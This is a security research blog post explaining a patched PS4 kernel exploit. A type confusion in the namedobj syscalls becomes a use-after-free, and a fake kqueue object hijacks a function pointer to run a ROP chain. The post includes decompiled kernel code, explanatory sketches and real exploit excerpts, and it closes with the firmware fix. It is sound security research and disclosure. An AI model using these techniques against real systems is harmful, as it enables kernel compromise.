The First PS4 Kernel Exploit: Adieu
Plenty of time has passed since we first demonstrated Linux running on the PS4.
Now we will step back a bit and explain how we managed to jump from the browser process into the kernel such that ps4-kexec et al. are usable.
Over time, ps4 firmware revisions have progressively added many mitigations and in general tried to lock down the system. This post will mainly touch on vulnerabilities and issues which are not present on the latest releases, but should still be useful for people wanting to investigate ps4 security.
Vulnerability Discovery
As previously explained, we were able to get a dump of the ps4 firmware 1.01 kernel via a PCIe man-in-the-middle attack. Like all FreeBSD kernels, this image included “export symbols” - symbols which are required to perform kernel and module initialization processes. However, the ps4 1.01 kernel also included full ELF symbols (obviously an oversight as they have been removed in later firmware versions). This oversight was beneficial to the reverse engineering process, although of course not a true prerequisite. Indeed, we began exploring the kernel by examining built-in metadata in the form of the syscall handler table - focusing on the ps4-specific entries.
After some recovering of structures, we discovered that a large portion of the ps4-specific syscalls are little more than wrappers to what is essentially a hash table API. The API exposes the following interface:
enum IDT_TYPE : u16 {
IDT_TYPE_EPORT = 0x0030,
IDT_TYPE_SBLOCK = 0x0040,
IDT_TYPE_EVF = 0x0110,
IDT_TYPE_OSEM = 0x0120,
IDT_TYPE_BUDGET = 0x2000,
IDT_TYPE_NAMEDOBJ_DBG = 0x5000,
};
struct id_entry {
struct sx *sxlock;
char *name;
void *ptr;
u64 tid;
IDT_TYPE kind;
u16 is_open;
u16 handle;
u16 state;
};
struct idt_bucket {
struct id_entry entries[128];
};
struct id_table {
struct idt_bucket buckets[64];
struct mtx mutex;
u32 num_buckets;
u32 cur_handle;
u32 max_entries;
};
id_table *id_table_create(int max_entries);
void id_table_destroy(id_table *idt);
int id_alloc(id_table *idt, id_entry **ide);
void id_set(id_entry *ide, IDT_TYPE kind, void *data, char *name);
void id_set_open(id_entry *ide, IDT_TYPE kind, void *data, char *name);
int id_is_opened(id_entry *ide);
void id_free(id_table *idt, int handle, id_entry *ide);
void id_unlock(id_entry *ide);
void *id_rlock(id_table *idt, signed int index, IDT_TYPE kind, id_entry **ide);
void *id_rlock_name(id_table *idt, IDT_TYPE kind, char *name, id_entry **ide);
void *id_wlock(id_table *idt, signed int index, IDT_TYPE kind, id_entry **ide);
Each process object in the kernel contains its own “idt” (ID Table) object. As can be inferred from the snippet above, the hash table essentially just stores pointers to opaque data blobs, along with a given kind and name. Entries may be accessed (and thus “locked”) with either read or write intent.
Note that IDT_TYPE is not a bitfield consisting of only unique powers of 2. This means that if we can control the kind of an id_entry, we may be able to cause a type confusion to occur (it is assumed that we may control name). Sure enough, kind may be set from usermode via the namedobj_create syscall:
struct namedobj_usr_t {
char *name;
void *object;
u64 field_10;
};
int sys_namedobj_create(struct thread *td, void *args) {
MACRO_EPERM rv; // ebx
int kind; // er14
id_table *idt; // r12
char *name; // r13
namedobj_usr_t *no; // rbx
int handle; // er15
id_entry *ide; // [rsp+8h] [rbp-38h]
__int64 v10; // [rsp+10h] [rbp-30h]
rv = EINVAL;
if ( *(_QWORD *)args ) {
// Note this is almost completely usermode-controlled!
kind = *((_DWORD *)args + 4) | 0x1000;
idt = td->td_proc->sce_idt;
name = (char *)malloc(0x20uLL, &M_NAME, 2);
rv = copyinstr(*(const void **)args, name, 0x20uLL, 0LL);
if ( rv ) {
free(name, &M_NAME);
} else {
no = (namedobj_usr_t *)malloc(0x18uLL, &M_NAME, 2);
no->name = name;
no->object = *((_QWORD *)args + 1);
handle = id_alloc(idt, &ide);
if ( handle == -1 ) {
free(name, &M_NAME);
free(no, &M_NAME);
rv = EAGAIN;
} else {
id_set(ide, (IDT_TYPE)kind, no, name);
id_unlock(ide);
td->td_retval[0] = handle;
rv = 0;
}
}
}
return rv;
}
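The arithmetic on kind can be modelled in a few lines of userland C. This is only a sketch, not kernel code: it assumes the (IDT_TYPE) cast truncates the value to 16 bits (the enum is declared as u16), and effective_kind and user_can_reach are hypothetical helper names.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Values copied from the IDT_TYPE enum above. */
enum {
    IDT_TYPE_BUDGET       = 0x2000,
    IDT_TYPE_NAMEDOBJ_DBG = 0x5000,
};

/* Hypothetical helper: models `kind = user_kind | 0x1000` followed by the
 * cast to the 16-bit IDT_TYPE (the truncation is an assumption). */
uint16_t effective_kind(uint32_t user_kind) {
    return (uint16_t)(user_kind | 0x1000u);
}

/* Hypothetical helper: a table kind can be produced from usermode only if
 * forcing bit 0x1000 on leaves it unchanged, i.e. the bit is already set. */
bool user_can_reach(uint16_t table_kind) {
    return effective_kind(table_kind) == table_kind;
}
```

Under these assumptions a user-supplied 0x4000 becomes 0x5000, which is exactly IDT_TYPE_NAMEDOBJ_DBG, while a kind such as IDT_TYPE_BUDGET (0x2000) cannot be produced this way.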
Now we need to find a way to have the kernel access and improperly use an object from our process’ (i.e. the browser process) idt which has a kind of 0x1000 plus any other number of bits set. This was found in the following code:
struct namedobj_dbg_t {
u32 field_0;
u32 _pad_4; // compiler-inserted alignment
u64 field_8;
u64 field_10;
u64 field_18;
u64 field_20;
};
int namedobj_create_ex(id_table *idt, char *name, u32 a3, u64 a4, u64 a5,
u64 a6, u64 a7) {
namedobj_dbg_t *no_exists; // rax
int rv; // er13
id_entry *ide_existing; // [rsp+20h] [rbp-40h]
rv = EAGAIN;
no_exists = (namedobj_dbg_t *)id_rlock_name(idt, IDT_TYPE_NAMEDOBJ_DBG, name,
&ide_existing);
if ( no_exists )
{
no_exists->field_0 = a3;
no_exists->field_8 = a4;
no_exists->field_10 = a5;
no_exists->field_18 = a6;
no_exists->field_20 = a7;
id_unlock(ide_existing);
rv = 0;
}
// ... unrelated code removed
return rv;
}
…which is accessible from the mdbg_service syscall:
struct mdbg_service_arg1 {
u32 field_0;
u32 field_4;
u64 field_8;
u64 field_10;
u64 field_18;
u64 field_20;
char name[32];
};
int sys_mdbg_service(struct thread *td, void *args) {
signed int rv; // ebx
void *uptr; // r14
mdbg_service_arg1 cmd_1; // [rsp+18h] [rbp-68h]
rv = 78; // ENOSYS
uptr = (void *)*((_QWORD *)args + 1);
switch ( (unsigned __int64)*(unsigned int *)args ) {
// ... unrelated code removed
case 1uLL:
rv = copyin(uptr, &cmd_1, 0x48uLL);
if ( rv )
break;
cmd_1.name[31] = 0;
rv = namedobj_create_ex(
td->td_proc->sce_idt,
cmd_1.name,
cmd_1.field_4,
cmd_1.field_8,
cmd_1.field_10,
cmd_1.field_18,
cmd_1.field_20);
break;
// ... unrelated code removed
}
return rv;
}
Using the combination of these syscalls, we can induce a type confusion. First, calling namedobj_create(name = "haxplz", kind = 0x1000 | 0x4000, ...) will cause the kernel to set a pointer of type namedobj_usr_t into the idt. Then, calling namedobj_create_ex(name = "haxplz", ...) will cause the kernel to access the same pointer, but cast it to type namedobj_dbg_t!
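To make the overlap concrete, here is a minimal userland sketch of the two layouts. The _model struct names and bytes_written_past_usr are hypothetical, and pointers are modelled as uint64_t so the sizes match the 64-bit kernel regardless of the host.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Userland model of namedobj_usr_t (what the table entry really points to). */
struct namedobj_usr_model {
    uint64_t name;      /* char *name   */
    uint64_t object;    /* void *object */
    uint64_t field_10;
};

/* Userland model of namedobj_dbg_t (what namedobj_create_ex assumes). */
struct namedobj_dbg_model {
    uint32_t field_0;
    uint32_t _pad_4;
    uint64_t field_8;
    uint64_t field_10;
    uint64_t field_18;
    uint64_t field_20;
};

/* Bytes that the field_0..field_20 stores touch beyond the end of the
 * smaller object when it is treated as the larger one. */
size_t bytes_written_past_usr(void) {
    size_t end_of_dbg_write =
        offsetof(struct namedobj_dbg_model, field_20) + sizeof(uint64_t);
    return end_of_dbg_write - sizeof(struct namedobj_usr_model);
}
```

In this model field_0 lands on the first four bytes of name, field_8 lands on object, and the last two stores fall 0x10 bytes past the end of the 0x18-byte object.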
Exploitation
To an exploiter without ps4 background, it might seem that the easiest way to exploit this bug would be to take advantage of the write off the end of the malloc’d namedobj_usr_t object. However, this turns out to be impossible (as far as I know) because of a side effect of the ps4 page size being changed to 0x4000 bytes (from the normal of 0x1000). It appears that in order to change the page size globally, the ps4 kernel developers opted to directly change the related macros.
One of the many changes resulting from this is that the smallest actual amount of memory which malloc may give back to a caller becomes 0x40 bytes. While this also results in tons of memory being completely wasted, it does serve to nullify certain exploitation techniques (likely completely by accident…).
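One way to read this: the 0x18-byte namedobj_usr_t ends up in a 0x40-byte slot, so the 0x28 bytes written through the namedobj_dbg_t view never leave that slot. The sketch below models this under the assumption that small allocations are rounded up to power-of-two buckets starting at 0x40; model_malloc_bucket and write_stays_in_bucket are hypothetical names, not kernel functions.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical model: round a request up to the next power-of-two bucket,
 * with 0x40 as the smallest bucket (per the text above). */
size_t model_malloc_bucket(size_t request) {
    size_t bucket = 0x40;
    while (bucket < request)
        bucket <<= 1;
    return bucket;
}

/* Returns 1 if writing bytes_written bytes from the start of an allocation
 * of the given request size stays inside that allocation's bucket. */
int write_stays_in_bucket(size_t request, size_t bytes_written) {
    return bytes_written <= model_malloc_bucket(request);
}
```

With these numbers, a 0x28-byte write into a 0x18-byte request only reaches slack space inside the same bucket, so no neighbouring object is corrupted.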
UAF Crafting
The way chosen to exploit this type confusion was actually to convert it into a use-after-free scenario. This was done with the help of the namedobj_delete syscall:
int sys_namedobj_delete(struct thread *td, void *args) {
struct proc *p; // rax
id_table *idt; // r15
namedobj_usr_t *no; // r14
int rv; // eax
id_entry *id_out; // [rsp+8h] [rbp-28h]
p = td->td_proc;
idt = p->sce_idt;
no = (namedobj_usr_t *)id_wlock(
p->sce_idt,
*(_DWORD *)args,
(IDT_TYPE)(*((_WORD *)args + 4) & ~0x1000 | 0x1000),
&id_out);
rv = ESRCH;
if ( no )
{
id_free(idt, *(_DWORD *)args, id_out);
id_unlock(id_out);
free(no->name, &M_NAME);
free(no, &M_NAME);
rv = 0;
}
return rv;
}
Note that the type confusion allows us to cast a namedobj_usr_t object to a namedobj_dbg_t one, and then update all of the namedobj_dbg_t fields. Not only does this allow us to write off the end of the actual namedobj_usr_t object, it also allows writing to the lower 32 bits of the namedobj_usr_t.name pointer, as well as all the other namedobj_usr_t fields. The fact that we may only update the lower 32 bits of namedobj_usr_t.name is actually a blessing in disguise (although it doesn’t matter so much for this post).
So, the use-after-free primitive we have allows us to free() any kernel address which happens to share the top 32 bits with no->name. This means we can have our choice of any malloc’d pointer to free - we just need to somehow find such a pointer :) Obviously, such a pointer should be able to be used in a nice way after we free it and reallocate the backing memory.
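The constraint on the pointer can be sketched as follows. This is a userland model only: it assumes a little-endian host (like the PS4's x86-64 CPU), the function names are hypothetical, and any addresses fed to it are made-up values rather than real kernel pointers.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

/* Models `no_exists->field_0 = a3` landing on the first 4 bytes of the
 * 8-byte name pointer. On a little-endian host those are the low 32 bits. */
uint64_t name_after_confused_write(uint64_t name, uint32_t a3) {
    unsigned char raw[sizeof name];
    memcpy(raw, &name, sizeof raw);
    memcpy(raw, &a3, sizeof a3);   /* overwrite bytes 0..3 only */
    memcpy(&name, raw, sizeof raw);
    return name;
}

/* A target can be handed to free() this way only if it already shares the
 * top 32 bits with the original name pointer. */
bool target_is_reachable(uint64_t name, uint64_t target) {
    return (name >> 32) == (target >> 32);
}
```

For a reachable target, passing its low 32 bits as a3 turns name into the target address, which namedobj_delete then passes to free().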
Finding a UAF Target
Since this was my first time working with FreeBSD, I just looked for some kernel object containing some function pointers which I could somehow derive the address of from the browser process. It turns out that on firmware 1.01 this is incredibly easy: sysctlbyname("kern.file", ...) will happily give you various kernel addresses relating to the file objects which the kernel uses to manage userspace file descriptors. From the exploit code:
constructor.prototype.getFileDescriptorKernelDataPtr = function(fd) {
var fd_xf_data = 0;
sys.getSysCtlByName('kern.file', function(oldp, oldlen) {
var pid = sys.getCurrentProcessId();
var file_size = read64(oldp).lo;
var num_files = oldlen / file_size;
for (var i = 0; i < num_files; i++) {
var xf_pid = read32(oldp.plus(i * file_size + 0x08));
var xf_fd = read32(oldp.plus(i * file_size + 0x10));
var xf_data = read64(oldp.plus(i * file_size + 0x38));
if (xf_pid == pid && xf_fd == fd) {
fd_xf_data = xf_data;
return;
}
}
});
return fd_xf_data;
}
This gives us the file.f_data value (for an fd we control) from JavaScript.
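The same scan can be written in C over a raw buffer, which makes the record layout easier to see. This is a minimal sketch: the offsets (0x08, 0x10, 0x38) and the "first field is the record size" convention are taken from the JavaScript above, while find_xf_data and the load helpers are hypothetical names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Offsets taken from the JavaScript excerpt above. */
enum { XF_PID_OFF = 0x08, XF_FD_OFF = 0x10, XF_DATA_OFF = 0x38 };

static uint32_t load32(const unsigned char *p) {
    uint32_t v;
    memcpy(&v, p, sizeof v);
    return v;
}

static uint64_t load64(const unsigned char *p) {
    uint64_t v;
    memcpy(&v, p, sizeof v);
    return v;
}

/* Walks fixed-size records in buf and returns the data pointer of the one
 * matching (pid, fd), or 0 if there is no match or the buffer is malformed. */
uint64_t find_xf_data(const unsigned char *buf, size_t len,
                      uint32_t pid, uint32_t fd) {
    if (len < sizeof(uint64_t))
        return 0;
    uint64_t rec = load64(buf);   /* each record starts with its own size */
    if (rec < XF_DATA_OFF + sizeof(uint64_t))
        return 0;                 /* too small to hold the data field */
    for (size_t off = 0; len - off >= rec; off += (size_t)rec) {
        const unsigned char *r = buf + off;
        if (load32(r + XF_PID_OFF) == pid && load32(r + XF_FD_OFF) == fd)
            return load64(r + XF_DATA_OFF);
    }
    return 0;
}
```

The bounds checks are an addition for the sketch; the original excerpt trusts the sizes returned by the sysctl.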
The type of the object pointed to by file.f_data depends on what type of file descriptor it is. I used kqueue as this met my goal of a target object containing function pointers. The idea will be to overwrite a kqueue and then cause one of the function pointers within kq->kq_knlist->kn_knlist to be executed, which will point to a rop chain. Note kq_knlist and kn_knlist are lists (as their names state), not standard pointers.
Putting it Together
Another exploit excerpt:
// finalize the ropchain and invoke it
constructor.prototype.trigger_kqueue = function() {
var fakefd = callFunc(syms.libkernel.kqueue).lo;
var filep = this.leaks.getFileDescriptorKernelDataPtr(fakefd);
var rop_scratch_len = 0;
var data_buf_len = this.kqueue_sizeof + this.klist_sizeof + this.knote_sizeof +
this.filterops_sizeof + this.knlist_sizeof + this.jmpbuf_sizeof +
rop_scratch_len;
var data_buf = allocateGCMemory(data_buf_len);
clearMemory(data_buf, data_buf_len);
var fakekq = data_buf;
var kl = fakekq.plus(this.kqueue_sizeof);
var kn = kl.plus(this.klist_sizeof);
var fop = kn.plus(this.knote_sizeof);
var knl = fop.plus(this.filterops_sizeof);
var jmpbuf = knl.plus(this.knlist_sizeof);
var rop_scratch = jmpbuf.plus(this.jmpbuf_sizeof);
// finalize ropchain
this.emitReturnViaJmpbuf(jmpbuf);
// create fake kq to execute the ropchain
var rop_stack = this.rop.getRopStack();
write64(jmpbuf.plus(0x48), rop_scratch); // rdi
write64(jmpbuf.plus(0x60), 0); // rcx (why?)
write64(jmpbuf.plus(0xe0), gadgets.ret); // next rip
write64(jmpbuf.plus(0xf8), rop_stack); // rsp
// longjmp_tail needs at least 1 stack slot to push next rip onto
write64(knl.plus(0x08), gadgets.ret); // kl_lock
write64(knl.plus(0x10), gadgets.longjmp_tail); // kl_unlock
write64(knl.plus(0x18), gadgets.ret); // kl_assert_locked
write64(knl.plus(0x20), gadgets.ret); // kl_assert_unlocked
write64(knl.plus(0x28), jmpbuf); // kl_lockarg (passed as
// rdi to the above funcptrs)
write32(fop, 1); // f_isfd = 1
write64(fop.plus(0x18), gadgets.ret0); // f_event = {ret 0}
write64(kn.plus(0x10), knl); // kn_knlist
write32(kn.plus(0x38), this.EVFILT_READ); // kn_filter = EVFILT_READ (16bit)
write32(kn.plus(0x50), 2); // kn_status = KN_QUEUED
write64(kn.plus(0x68), fop); // kn_fop
write64(kl, kn); // slh_first = &kn
this.writeFakeMtx(fakekq.plus(0)); // kq_lock
write32(fakekq.plus(0xa4), 1); // kq_knlistsize = 1
write64(fakekq.plus(0xa8), kl); // kq_knlist = &kl
var change = allocateGCMemory(this.kevent_sizeof);
clearMemory(change, this.kevent_sizeof);
write32(change.plus(8), this.EVFILT_READ);
// free, try to fill the buffer, then cause it to be used
this.kernelFree(filep);
this.ioctlSpray(fakekq, this.kqueue_sizeof);
callFunc(syms.libkernel.kevent, fakefd, change, 1, 0, 0, 0);
// safe as long as injected code has fixed the corrupted kqueue
callFunc(syms.libkernel.close, fakefd);
}
Above is shown the creation of a kqueue object in userspace, which then gets sprayed into the kernel after performing our UAF primitive (via kernelFree()) simply by calling ioctl() with it. After the spray, executing the syscall kevent() with the fd relating to our corrupted file object will cause the kernel to call the kqueue object’s kl_unlock function pointer, which will kick off execution of the ROP chain.
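Why controlling the structure means controlling the call can be shown with a harmless userland model. The field order below follows the offsets written in trigger_kqueue() (0x08 through 0x28 on a 64-bit kernel); everything else, including model_knlist_lock_unlock and the stand-in callbacks, is hypothetical and only approximates how the kernel locks and unlocks a knlist.

```c
#include <assert.h>
#include <stddef.h>

/* Userland model of the callback part of a knlist. */
struct knlist_model {
    void *kl_list;                        /* list head, unused here */
    void (*kl_lock)(void *);
    void (*kl_unlock)(void *);
    void (*kl_assert_locked)(void *);
    void (*kl_assert_unlocked)(void *);
    void *kl_lockarg;                     /* passed to every callback */
};

/* Stand-ins for the gadgets: one does nothing, one records its argument. */
void *last_unlock_arg = NULL;
void model_ret(void *arg) { (void)arg; }
void model_unlock(void *arg) { last_unlock_arg = arg; }

/* Hypothetical model of a lock/unlock pair: both the callbacks and their
 * argument are read straight out of the (attacker-filled) structure. */
void model_knlist_lock_unlock(struct knlist_model *knl) {
    knl->kl_lock(knl->kl_lockarg);
    knl->kl_unlock(knl->kl_lockarg);
}
```

In the excerpt above, kl_unlock plays the role of model_unlock and kl_lockarg is the jmpbuf, which is how the jmpbuf pointer ends up as the first argument of longjmp_tail.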
Cleaning Up
Since this exploit leaves a corrupted file object in the browser’s file descriptor table, the first thing for the kernel payload to do is actually to remove that corruption. Otherwise, the kernel will eventually panic (normally while iterating the process’ file descriptor table in an attempt to close() all of them). This can easily be done with the following:
void fix_corrupted_kqueue(struct thread *td) {
// This method prevents the kernel from crashing (most of the time), but
// the process will sigsegv when exiting.
// blog note:
// I actually no longer remember if the above comment is true.
// I always kexec directly to linux so it doesn't matter to me :)
struct filedesc *fdp = td->td_proc->p_fd;
for (int fd = 0; fd < fdp->fd_nfiles; fd++) {
struct file *fp = fdp->fd_ofiles[fd];
if (fp && fp->f_type == DTYPE_KQUEUE) {
struct kqueue *kq = fp->f_data;
if ((uintptr_t)kq->kq_knlist < VM_USER_MAX) {
// found the bad one...kill it
SLIST_REMOVE(&fdp->fd_kqlist, kq, kqueue, kq_list);
fdp->fd_ofiles[fd] = NULL;
fdp->fd_ofileflags[fd] = 0;
return;
}
}
}
}
...
fix_corrupted_kqueue(curthread());
Adieu
The namedobj exploit was present and exploitable (albeit using a slightly different method than described here) until it was fixed in firmware version 4.06. This vulnerability was also found and exploited by (at least) Chaitin Tech, so props to them! Taking a quick look at the 4.07 kernel, we can see a straightforward fix (4.06 is assumed to be identical - only had 4.07 on hand while writing this post):
int sys_namedobj_create(struct thread *td, void *args) {
// ...
rv = EINVAL;
kind = *((_DWORD *)args + 4);
if ( !(kind & 0x4000) && *(_QWORD *)args ) {
// ... (unchanged)
}
return rv;
}
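The effect of the added check can be verified exhaustively in userland. This sketch assumes the unchanged part of the function still ORs in 0x1000 and truncates to 16 bits as before; kind_accepted_after_fix and can_forge_dbg_kind are hypothetical names.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Models the new guard: any kind with bit 0x4000 set is rejected. */
bool kind_accepted_after_fix(uint32_t user_kind) {
    return (user_kind & 0x4000u) == 0;
}

/* True if an accepted kind would still end up stored as 0x5000
 * (IDT_TYPE_NAMEDOBJ_DBG) after the OR with 0x1000 and the u16 cast. */
bool can_forge_dbg_kind(uint32_t user_kind) {
    return kind_accepted_after_fix(user_kind) &&
           (uint16_t)(user_kind | 0x1000u) == 0x5000;
}
```

Since 0x5000 has bit 0x4000 set and the OR only adds bit 0x1000, no accepted value can produce it, so the lookup in namedobj_create_ex can no longer find a usermode-created entry.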
And so we say goodbye to a nice exploit.
I hope you enjoyed this blast from the past :)
Keep hacking!